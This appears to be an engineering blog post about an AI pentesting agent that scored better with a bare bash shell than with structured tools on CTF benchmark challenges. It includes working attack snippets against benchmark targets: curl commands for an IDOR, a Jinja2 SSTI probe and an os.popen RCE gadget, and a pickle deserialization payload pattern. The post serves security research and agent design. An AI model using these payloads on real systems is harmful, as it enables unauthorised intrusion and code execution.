why we gave our agent a terminal instead of tools
we built 10 structured tools for web pentesting. then we gave the agent just curl and it outperformed everything.
two weeks went into building structured tools for web pentesting. crawl_page, submit_form, http_request, extract_links — typed parameters, validated inputs, clean JSON responses. the kind of tooling that looks great in a design doc.
then the agent flailed with them for 20+ turns trying to chain a login flow into an IDOR exploit. it never got the flag. swap in a bash shell and the agent extracted the flag in ten turns, first try.
this is the story of how shell-first beat structured tools for AI pentesting — and why pwnkit is built around that idea now.
the structured tools
the original tool set was what you’d expect from a web pentesting framework. each tool did one thing with typed params:
```
// crawl a page, get back structured links + forms
crawl_page({ url: "http://target/login", depth: 1 })

// submit a form with named fields
submit_form({ url: "http://target/login", method: "POST",
  fields: { username: "admin", password: "password" } })

// make an arbitrary HTTP request
http_request({ url: "http://target/api/users/2",
  method: "GET", headers: { "Cookie": "session=abc123" } })
```
clean abstractions. good DX. pentesting isn’t a clean abstraction.
the agent needed to log in, capture a session cookie, use that cookie to access another user’s endpoint, and extract a flag from the response. four steps. but with structured tools, each step was its own tool call with its own parameters, and the agent had to manually thread state between them. which cookie came back from the login? what format is it in? does it go in a header or does the tool handle it?
it kept getting confused. it would call submit_form for the login, get back a response with Set-Cookie in the headers, then call http_request with the wrong cookie format. or forget the cookie entirely. or try to call crawl_page on the API endpoint and get back HTML parsing errors because the response was JSON.
twenty turns in, it was still looping. the context window was filling with failed attempts and the agent was losing track of what it had already tried.
the experiment
three tools total:
- shell_exec — run any bash command, get stdout/stderr back
- save_finding — record a confirmed vulnerability
- done — signal completion
no crawling abstraction. no form submission helper. no HTTP client wrapper. just a shell.
```
# what the agent actually did (10 turns)

# 1. login and capture cookies
curl -c cookies.txt -d "username=admin&password=password" http://target/login

# 2. check what we got
cat cookies.txt

# 3. use the session to hit another user's profile
curl -b cookies.txt http://target/api/users/2

# 4. flag was right there in the response
# {"id": 2, "name": "victim", "secret": "FLAG{idor_confirmed}"}
```
ten turns. the agent logged in, captured cookies to a jar, made an authenticated request to another user’s endpoint, found the IDOR, and extracted the flag. no confusion about cookie formats. no state threading between tool calls. just curl doing what curl does.
why this works
three reasons, none of them obvious until you watch it happen.
the model already knows curl. every language model has seen millions of curl examples in its training data. it knows -c saves cookies and -b sends them. it knows -L follows redirects. it knows how to pipe output through jq or grep. a structured tool like http_request requires learning a specific API. curl is an API the model already knows. zero ramp-up.
one tool means zero cognitive overhead. with ten tools, the agent burns tokens deciding which tool to use. should it crawl_page or http_request? is this a form submission or a raw POST? with one tool, there’s no decision. every action is shell_exec. the reasoning budget goes into the actual pentesting problem instead of tool selection.
bash is composable in ways structured tools aren’t. a single curl command can follow redirects, save cookies, send custom headers, post multipart data, and pipe the response through jq — all in one invocation. with structured tools, that’s five separate tool calls with state threaded between them. the shell gives you pipes, redirects, variables, loops, and the entire unix toolkit for free. curl | grep | awk in one command versus three tool calls with intermediate parsing.
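a network-free sketch of the composability point — a canned response stands in for what a live curl would return, but the pipeline is the same either way (URL and field names are illustrative, not from the benchmark):

```shell
# canned JSON standing in for the output of
#   curl -b cookies.txt http://target/api/users/2
response='{"id": 2, "name": "victim", "secret": "FLAG{idor_confirmed}"}'

# one pipeline extracts the flag; with structured tools this would be a
# request call plus a separate parsing step, with state threaded between them
echo "$response" | grep -oE 'FLAG\{[^}]*\}'
# → FLAG{idor_confirmed}
```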
the data
the shell-first approach was tested against 10 challenges from the XBOW benchmark — Docker-based CTFs covering traditional web vulnerabilities. same model, no benchmark-specific tuning.
two of the ten challenges (Melodic Mayhem and GraphQL) hit Azure timeouts.
the deserialization challenge was the surprise. four turns. the agent generated a serialized payload with python, piped it through base64, and sent it via curl in a single command. with structured tools, this would have needed a separate tool just to encode the payload, then another to send it, and the model kept getting the encoding wrong across tool boundaries.
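the post doesn't show the actual payload or endpoint, but the generate-encode-send pattern looks roughly like this (the pickled object and the target URL are illustrative stand-ins):

```shell
# build and base64-encode a serialized payload in one command substitution
payload=$(python3 -c "import pickle, base64; print(base64.b64encode(pickle.dumps({'is_admin': True})).decode())")

# sending it is one more step on the same command line (hypothetical endpoint):
#   curl -s -d "data=$payload" http://target/restore
echo "$payload" | base64 -d > /dev/null && echo "payload encodes cleanly"
# → payload encodes cleanly
```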
the SSTI challenge was five turns because the agent’s first payload ({{7*7}}) confirmed the template injection, and then it escalated directly to RCE with a well-known Jinja2 payload. one curl per step. no friction.
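for reference, the two payloads in question — the URL and parameter they were sent with aren't in the post, so the curl line below is illustrative:

```shell
# step 1: probe — if the page renders 49, user input reaches the template engine
probe='{{7*7}}'

# step 2: escalate — one of the well-known Jinja2 RCE gadgets
rce='{{cycler.__init__.__globals__.os.popen("id").read()}}'

# each step was a single request, e.g.:
#   curl -s "http://target/greet?name=$probe"
echo "$probe"
# → {{7*7}}
```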
the blind SQLi is the retry story worth telling. with a 15-turn budget, the agent couldn’t crack it — time-based blind extraction is slow and the agent ran out of room. bumping the budget to 25 turns produced a flag in 20. the lesson: some challenges need more context window, not better tools. shell-first was correct, it just needed more runway.
how we compare
| tool | XBOW score | approach |
|---|---|---|
| KinoSec | 92.3% | black-box, template-driven + AI |
| XBOW (their own agent) | 85% | purpose-built for their benchmark |
| MAPTA | 76.9% | multi-agent pentesting |
| pwnkit | 70% | shell-first, no structured tools |
70% with just a bash shell and an LLM lands in the same ballpark as dedicated web pentesting tools. the gap to KinoSec is real — they have template libraries and years of web-specific tuning — but the shell-first approach scales without that infrastructure.
prior art
this isn’t a new idea. it just got rediscovered the hard way.
pi-mono’s work on bash-as-universal-tool was a major influence. the thesis is simple: bash is the Swiss army knife that every model already knows. there’s no point building a hundred specialized tools when one general-purpose tool covers all of them.
Terminus took this further with their single-tmux-tool approach — give the agent a persistent terminal session and let it drive. no tool sprawl, no state management, no abstraction mismatches.
research from XBOW and KinoSec on autonomous pentesting agents showed that the best-performing agents were the ones with the fewest, most general tools. the more specialized the toolkit, the more the agent struggled with tool selection and state threading.
what this means for pwnkit
pwnkit is now shell-first. the agent gets a sandboxed bash environment with full access to curl, python, nmap, sqlmap, and whatever else is installed. structured tools like crawl_page and submit_form still exist, but they’re optional — available if a specific workflow benefits from them, not required for the core loop.
the mental model changed. the agent isn’t a user clicking through a GUI with carefully designed buttons. it’s a pentester sitting in front of a terminal. it thinks in commands, not in tool calls. that maps much more naturally to how actual pentesting works.
```
# pwnkit's core tool loop
shell_exec → observe output → reason → shell_exec → ...
     ↓
save_finding (when confirmed)
     ↓
done (when complete)
```
the tradeoff
this isn’t free. two real costs.
more tokens. curl returns raw HTTP responses. headers, HTML, JSON — all of it lands in the context window. structured tools could parse and summarize, returning only the relevant data. with shell-first, the agent sees everything, which means bigger contexts and more token spend. output truncation and instructions to pipe through head or jq mitigate this, but it’s still more expensive than structured tools on a per-turn basis.
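the mitigation amounts to filtering before output reaches the model. a network-free sketch, with a canned page standing in for a live `curl -s http://target/`:

```shell
# canned HTML standing in for a raw curl response full of boilerplate
page='<html><a href="/login">login</a><a href="/admin">admin</a><p>lots of boilerplate...</p></html>'

# filter and truncate instead of dumping the whole response into context
echo "$page" | grep -oE 'href="[^"]*"' | head -20
# → href="/login"
# → href="/admin"
```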
sandboxing is mandatory. giving an AI agent arbitrary shell access is exactly as dangerous as it sounds. pwnkit runs everything in isolated containers with no network access except to the target. no filesystem persistence between runs. no access to the host. this isn’t optional — it was the first thing built before the agent ran a single command. for anyone building something similar: sandbox first, agent second. always.
the flexibility gain is worth the cost. the agent can use any tool that exists on the system — not just the ones anticipated and wrapped in advance. when a new challenge requires sqlmap or ffuf or a custom python script, the agent just uses it. no new tool implementation. no SDK update. just shell_exec.
the lesson
the original plan was to build the best structured tool set for AI pentesting. there was a roadmap. there were typed schemas. there were tests.
then the benchmark ran and the dumb approach won. not by a little — the structured tools couldn’t even complete the challenges the shell knocked out in under a dozen turns.
sometimes the right architecture isn’t the one you designed. it’s the one that emerges when you finally measure what works.